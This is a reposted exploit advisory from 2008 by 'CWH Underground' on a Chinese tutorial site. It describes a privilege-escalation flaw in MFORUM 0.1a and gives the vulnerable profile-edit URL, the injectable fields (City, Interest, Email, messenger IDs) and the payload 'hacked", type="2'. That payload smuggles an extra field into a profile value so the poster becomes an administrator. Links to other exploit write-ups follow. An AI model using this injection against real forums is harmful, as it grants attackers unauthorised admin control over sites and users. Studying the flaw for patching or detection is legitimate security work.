手机
当前位置:查字典教程网 >网络安全 >Exploit >MFORUM 0.1a Arbitrary Add-Admin Vulnerability
MFORUM 0.1a Arbitrary Add-Admin Vulnerability
摘要:=================================================MFORUM0.1aArbitraryAd...

=================================================

MFORUM 0.1a Arbitrary Add-Admin Vulnerability

=================================================

,--^----------,--------,-----,-------^--,

| ||||||||| `--------' | O .. CWH Underground Hacking Team ..

` ---------------------------^----------|

`_,-------, _________________________|

/ XXXXXX /`| /

/ XXXXXX / ` /

/ XXXXXX /______(

/ XXXXXX /

/ XXXXXX /

(________(

`------'

AUTHOR : CWH Underground

DATE : 13 July 2008

SITE : cwh.citec.us

###################################################################################

APPLICATION : MFORUM

VERSION : 0.1a

DOWNLOAD : http://downloads.sourceforge.net/marcioforum/mforum.zip

###################################################################################

--- Add-Admin Exploit ---

***magic_quotes_gpc = off***

-------------

Description

-------------

MFORUM 0.1a has Vulnerability to escalate user's privilege to administartor's privilege.

That Vulnerable in "Control Panel - Edit your profile" (http://[Target]/[mforum_path]/usercp.php?mode=edit_profile)

and you can injection code into various field (City, Interest, Email, Icq, msn, Yahoo Messenger).

This action will give your account can use Admin Control Panel (http://[Target]/[mforum_path]/admin/index.php)

with Administrative's Privilege.

-----------------

Vulnerable Path

-----------------

[ ] http://[target]/[mforum_path]/usercp.php?mode=edit_profile

--------------

Exploit code

--------------

[ ] hacked", type="2

#####################################################################

Greetz : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos

Special Thx : asylu3, str0ke, citec.us, milw0rm.com

#####################################################################

【MFORUM 0.1a Arbitrary Add-Admin Vulnerability】相关文章:

Maian Gallery 2.0 Insecure Cookie Handling Vulnerability

PhotoPost vBGallery 2.4.2 Arbitrary File Upload Vulnerability

Avlc Forum (vlc_forum.php id) Remote SQL Injection Vulnerability

jSite 1.0 OE (SQL/LFI) Multiple Remote Vulnerabilities

tplSoccerSite 1.0 Multiple Remote SQL Injection Vulnerabilities

Rianxosencabos CMS 0.9 Remote Add Admin Exploit

Maian Greetings 2.1 Insecure Cookie Handling Vulnerability

moziloCMS 1.10.1 (download.php) Arbitrary Download File Exploit

AlstraSoft Affiliate Network Pro (pgm) Remote SQL Injection Vulnerability

Pluck 4.5.1 (blogpost) Local File Inclusion Vulnerability (win only)

精品推荐
分类导航